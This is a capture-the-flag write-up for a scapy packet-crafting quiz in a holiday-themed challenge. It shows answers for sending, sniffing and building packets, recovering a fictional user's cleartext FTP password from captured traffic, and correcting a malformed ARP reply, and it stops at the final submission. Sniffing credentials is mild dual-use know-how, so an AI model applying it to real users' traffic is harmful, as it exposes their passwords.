&lt;h2&gt;&lt;a class="toc-backref" href="#id40"&gt;Objective 9:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="alabaster-snowball-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id41"&gt;Alabaster Snowball's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;╔════════════════════════════════════════════════════════════════╗&lt;/span&gt;
&lt;span class="go"&gt;║  ___ ___ ___ ___ ___ _  _ _____   ___  _   ___ _  _____ _____  ║&lt;/span&gt;
&lt;span class="go"&gt;║ | _ \ _ \ __/ __| __| \| |_   _| | _ \/_\ / __| |/ / __|_   _| ║&lt;/span&gt;
&lt;span class="go"&gt;║ |  _/   / _|\__ \ _|| .` | | |   |  _/ _ \ (__| &amp;#39; &amp;lt;| _|  | |   ║&lt;/span&gt;
&lt;span class="go"&gt;║ |_| |_|_\___|___/___|_|\_| |_|   |_|/_/ \_\___|_|\_\___| |_|   ║&lt;/span&gt;
&lt;span class="go"&gt;║                ___                                             ║&lt;/span&gt;
&lt;span class="go"&gt;║               | _ \_ _ ___ _ __ _ __  ___ _ _                  ║&lt;/span&gt;
&lt;span class="go"&gt;║               |  _/ &amp;#39;_/ -_) &amp;#39;_ \ &amp;#39;_ \/ -_) &amp;#39;_|                 ║&lt;/span&gt;
&lt;span class="go"&gt;║               |_| |_| \___| .__/ .__/\___|_|                   ║&lt;/span&gt;
&lt;span class="go"&gt;║                           |_|  |_|                             ║&lt;/span&gt;
&lt;span class="go"&gt;║                (Packets prepared with scapy)                   ║&lt;/span&gt;
&lt;span class="go"&gt;╚════════════════════════════════════════════════════════════════╝&lt;/span&gt;
&lt;span class="go"&gt;Type &amp;quot;yes&amp;quot; to begin. yes&lt;/span&gt;
&lt;span class="go"&gt;╔════════════════════════════════════════════════════════════════╗&lt;/span&gt;
&lt;span class="go"&gt;║ HELP MENU:                                                     ║&lt;/span&gt;
&lt;span class="go"&gt;╠════════════════════════════════════════════════════════════════╣&lt;/span&gt;
&lt;span class="go"&gt;║ &amp;#39;help()&amp;#39; prints the present packet scapy help.                 ║&lt;/span&gt;
&lt;span class="go"&gt;║ &amp;#39;help_menu()&amp;#39; prints the present packet scapy help.            ║&lt;/span&gt;
&lt;span class="go"&gt;║ &amp;#39;task.get()&amp;#39; prints the current task to be solved.             ║&lt;/span&gt;
&lt;span class="go"&gt;║ &amp;#39;task.task()&amp;#39; prints the current task to be solved.            ║&lt;/span&gt;
&lt;span class="go"&gt;║ &amp;#39;task.help()&amp;#39; prints help on how to complete your task         ║&lt;/span&gt;
&lt;span class="go"&gt;║ &amp;#39;task.submit(answer)&amp;#39; submit an answer to the current task     ║&lt;/span&gt;
&lt;span class="go"&gt;║ &amp;#39;task.answered()&amp;#39; print through all successfully answered.     ║&lt;/span&gt;
&lt;span class="go"&gt;╚════════════════════════════════════════════════════════════════╝&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="go"&gt;Welcome to the &amp;quot;Present Packet Prepper&amp;quot; interface! The North Pole could use your help preparing present packets for shipment.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, this kind of looks like Sugarplum Mary's challenge, but instead of having
to show basic understanding of Linux commands, we must show a basic
understanding of &lt;a class="reference external" href="https://scapy.readthedocs.io/en/latest/"&gt;scapy&lt;/a&gt;, the
famous packet manipulation Python library.&lt;/p&gt;
&lt;p&gt;I found the answers in scapy's documentation. I'll detail answers that were not
trivial. Let's go:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Start by running the task.submit() function passing in a string argument of &amp;#39;start&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;Type task.help() for help on this question.&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;start&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Correct! adding a () to a function or class will execute it. Ex - FunctionExecuted()&lt;/span&gt;

&lt;span class="go"&gt;Submit the class object of the scapy module that sends packets at layer 3 of the OSI model.&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;scapy&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sendrecv&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;send&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Correct! The &amp;quot;send&amp;quot; scapy class will send a crafted scapy packet out of a network interface.&lt;/span&gt;

&lt;span class="go"&gt;Submit the class object of the scapy module that sniffs network packets and returns those packets in a list.&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sniff&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Correct! the &amp;quot;sniff&amp;quot; scapy class will sniff network traffic and return these packets in a list.&lt;/span&gt;

&lt;span class="go"&gt;Submit the NUMBER only from the choices below that would successfully send a TCP packet and then return the first sniffed response packet to be stored in a variable named &amp;quot;pkt&amp;quot;:&lt;/span&gt;
&lt;span class="go"&gt;1. pkt = sr1(IP(dst=&amp;quot;127.0.0.1&amp;quot;)/TCP(dport=20))&lt;/span&gt;
&lt;span class="go"&gt;2. pkt = sniff(IP(dst=&amp;quot;127.0.0.1&amp;quot;)/TCP(dport=20))&lt;/span&gt;
&lt;span class="go"&gt;3. pkt = sendp(IP(dst=&amp;quot;127.0.0.1&amp;quot;)/TCP(dport=20))&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Correct! sr1 will send a packet, then immediately sniff for a response packet.&lt;/span&gt;

&lt;span class="go"&gt;Submit the class object of the scapy module that can read pcap or pcapng files and return a list of packets.&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rdpcap&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Correct! the &amp;quot;rdpcap&amp;quot; scapy class can read pcap files.&lt;/span&gt;

&lt;span class="go"&gt;The variable UDP_PACKETS contains a list of UDP packets. Submit the NUMBER only from the choices below that correctly prints a summary of UDP_PACKETS:&lt;/span&gt;
&lt;span class="go"&gt;1. UDP_PACKETS.print()&lt;/span&gt;
&lt;span class="go"&gt;2. UDP_PACKETS.show()&lt;/span&gt;
&lt;span class="go"&gt;3. UDP_PACKETS.list()&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Correct! .show() can be used on lists of packets AND on an individual packet.&lt;/span&gt;


&lt;span class="go"&gt;Submit only the first packet found in UDP_PACKETS.&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;UDP_PACKETS&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;span class="go"&gt;Correct! Scapy packet lists work just like regular python lists so packets can be accessed by their position in the list starting at offset 0.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For the following question, I took a convoluted approach, using &lt;code&gt;getlayer(scapy.layers.inet.TCP)&lt;/code&gt;,
where I could have just done &lt;code&gt;task.submit(TCP_PACKETS[1][TCP])&lt;/code&gt; (I also
didn't realize that every class had been directly imported):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Submit only the entire TCP layer of the second packet in TCP_PACKETS.&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;TCP_PACKETS&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getlayer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;scapy&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;layers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;inet&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;TCP&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="go"&gt;Correct! Most of the major fields like Ether, IP, TCP, UDP, ICMP, DNS, DNSQR, DNSRR, Raw, etc... can be accessed this way. Ex - pkt[IP][TCP]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Change the source IP address of the first packet found in UDP_PACKETS to 127.0.0.1 and then submit this modified packet&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;pkt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;UDP_PACKETS&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;pkt&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;IP  version=4 ihl=5 tos=0x0 len=60 id=0 flags=DF frag=0 ttl=64 proto=udp chksum=0x6543 src=192.168.170.8 dst=192.168.170.20 |&amp;lt;UDP  sport=32795 dport=domain len=40 chksum=0xaf61 |&amp;lt;DNS  id=30144 qr=0 opcode=QUERY aa=0 tc=0 rd=1 ra=0 z=0 ad=0 cd=0 rcode=ok qdcount=1 ancount=0 nscount=0 arcount=0 qd=&amp;lt;DNSQR  qname=&amp;#39;www.elves.rule.&amp;#39; qtype=A qclass=IN |&amp;gt; an=None ns=None ar=None |&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;pkt&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;127.0.0.1&amp;#39;&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pkt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Correct! You can change ALL scapy packet attributes using this method.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For the following question, I coded a &lt;code&gt;for&lt;/code&gt; loop displaying the raw
packets contained in &lt;code&gt;TCP_PACKETS&lt;/code&gt;. We can see that Alabaster is
connecting to an FTP server, and is sending his password with the command
&lt;code&gt;PASS echo&lt;/code&gt;. Therefore, his password is &lt;code&gt;echo&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Submit the password &amp;quot;task.submit(&amp;#39;elf_password&amp;#39;)&amp;quot; of the user alabaster as found in the packet list TCP_PACKETS.&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;TCP_PACKETS&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;span class="gp"&gt;... &lt;/span&gt;    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;span class="gp"&gt;... &lt;/span&gt;        &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;Raw&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;span class="gp"&gt;... &lt;/span&gt;    &lt;span class="k"&gt;except&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;span class="gp"&gt;... &lt;/span&gt;        &lt;span class="k"&gt;continue&lt;/span&gt;
&lt;span class="go"&gt;WARNING: Calling str(pkt) on Python 3 makes no sense!&lt;/span&gt;
&lt;span class="go"&gt;b&amp;#39;220 North Pole FTP Server\r\n&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;WARNING: Calling str(pkt) on Python 3 makes no sense!&lt;/span&gt;
&lt;span class="go"&gt;b&amp;#39;USER alabaster\r&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;WARNING: more Calling str(pkt) on Python 3 makes no sense!&lt;/span&gt;
&lt;span class="go"&gt;b&amp;#39;331 Password required for alabaster.\r&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;b&amp;#39;PASS echo\r\n&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;b&amp;#39;230 User alabaster logged in.\r&amp;#39;&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;echo&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Correct! Here is some really nice list comprehension that will grab all the raw payloads from tcp packets:&lt;/span&gt;
&lt;span class="go"&gt;[pkt[Raw].load for pkt in TCP_PACKETS if Raw in pkt]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;The ICMP_PACKETS variable contains a packet list of several icmp echo-request and icmp echo-reply packets. Submit only the ICMP chksum value from the second packet in the ICMP_PACKETS list.&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ICMP_PACKETS&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="n"&gt;ICMP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;chksum&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Correct! You can access the ICMP chksum value from the second packet using ICMP_PACKETS[1][ICMP].chksum .&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For the following question, only answers 1. and 3. are ICMP
&lt;code&gt;echo-request&lt;/code&gt;, so answer 2. is out. Then, we can see that answer 1. is
defining an IP address source of &lt;code&gt;127.0.0.1&lt;/code&gt; in the &lt;code&gt;Ether&lt;/code&gt;
constructor, which is the data link layer, below the network layer. So this
answer is incorrect. The only good remaining answer is the third one:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Submit the number of the choice below that would correctly create a ICMP echo request packet with a destination IP of 127.0.0.1 stored in the variable named &amp;quot;pkt&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;1. pkt = Ether(src=&amp;#39;127.0.0.1&amp;#39;)/ICMP(type=&amp;quot;echo-request&amp;quot;)&lt;/span&gt;
&lt;span class="go"&gt;2. pkt = IP(src=&amp;#39;127.0.0.1&amp;#39;)/ICMP(type=&amp;quot;echo-reply&amp;quot;)&lt;/span&gt;
&lt;span class="go"&gt;3. pkt = IP(dst=&amp;#39;127.0.0.1&amp;#39;)/ICMP(type=&amp;quot;echo-request&amp;quot;)&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Correct! Once you assign the packet to a variable named &amp;quot;pkt&amp;quot; you can then use that variable to send or manipulate your created packet.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Create and then submit a UDP packet with a dport of 5000 and a dst IP of 127.127.127.127. (all other packet attributes can be unspecified)&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;127.127.127.127&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="n"&gt;UDP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5000&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="go"&gt;Correct! Your UDP packet creation should look something like this:&lt;/span&gt;
&lt;span class="go"&gt;pkt = IP(dst=&amp;quot;127.127.127.127&amp;quot;)/UDP(dport=5000)&lt;/span&gt;
&lt;span class="go"&gt;task.submit(pkt)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For the next question, I used the scapy documentation on &lt;a class="reference external" href="https://scapy.readthedocs.io/en/latest/usage.html?highlight=dnsqr#dns-requests"&gt;creating DNS requests&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Create and then submit a UDP packet with a dport of 53, a dst IP of 127.2.3.4, and is a DNS query with a qname of &amp;quot;elveslove.santa&amp;quot;. (all other packet attributes can be unspecified)&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;pkt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;127.2.3.4&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="n"&gt;UDP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;53&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="n"&gt;DNS&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;qd&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;DNSQR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;qname&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;elveslove.santa&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pkt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Correct! Your UDP packet creation should look something like this:&lt;/span&gt;
&lt;span class="go"&gt;pkt = IP(dst=&amp;quot;127.2.3.4&amp;quot;)/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname=&amp;quot;elveslove.santa&amp;quot;))&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For the following answer, I first took a look at both packets:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;The variable ARP_PACKETS contains an ARP request and response packets. The ARP response (the second packet) has 3 incorrect fields in the ARP layer. Correct the second packet in ARP_PACKETS to be a proper ARP response and then task.submit(ARP_PACKETS) for inspection.&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;ARP_PACKETS&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Ether  dst=ff:ff:ff:ff:ff:ff src=00:16:ce:6e:8b:24 type=ARP |&amp;lt;ARP  hwtype=0x1 ptype=IPv4 hwlen=6 plen=4 op=who-has hwsrc=00:16:ce:6e:8b:24 psrc=192.168.0.114 hwdst=00:00:00:00:00:00 pdst=192.168.0.1 |&amp;gt;&amp;gt;&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;ARP_PACKETS&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Ether  dst=00:16:ce:6e:8b:24 src=00:13:46:0b:22:ba type=ARP |&amp;lt;ARP  hwtype=0x1 ptype=IPv4 hwlen=6 plen=4 op=None hwsrc=ff:ff:ff:ff:ff:ff psrc=192.168.0.1 hwdst=ff:ff:ff:ff:ff:ff pdst=192.168.0.114 |&amp;lt;Padding  load=&amp;#39;\xc0\xa8\x00r&amp;#39; |&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see the three problems in the ARP layer of the second packet:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;&lt;code&gt;op&lt;/code&gt; is set to &lt;code&gt;None&lt;/code&gt;, where it should be set to ARP response.
By digging in &lt;a class="reference external" href="https://scapy.readthedocs.io/en/latest/usage.html#simplistic-arp-monitor"&gt;scapy's documentation&lt;/a&gt;,
we can see that an ARP request (&lt;code&gt;op=who-has&lt;/code&gt;) means &lt;code&gt;op=1&lt;/code&gt; and
an ARP reply (&lt;code&gt;is-at&lt;/code&gt;) means &lt;code&gt;op=2&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;hwsrc&lt;/code&gt; is set to the broadcast address, where it should be set to the
MAC address of the sender, which, from the &lt;code&gt;Ether&lt;/code&gt; layer, is
&lt;code&gt;00:13:46:0b:22:ba&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;hwdst&lt;/code&gt; is also set to the broadcast address, where it should be set
to the MAC address of the receiver, which, still from the &lt;code&gt;Ether&lt;/code&gt;
layer (either of the first or second packet) is &lt;code&gt;00:16:ce:6e:8b:24&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Let's fix all these three things:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;ARP_PACKETS&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="n"&gt;ARP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;op&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;ARP_PACKETS&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="n"&gt;ARP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hwsrc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;00:13:46:0b:22:ba&amp;#39;&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;ARP_PACKETS&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="n"&gt;ARP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hwdst&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;00:16:ce:6e:8b:24&amp;#39;&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ARP_PACKETS&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
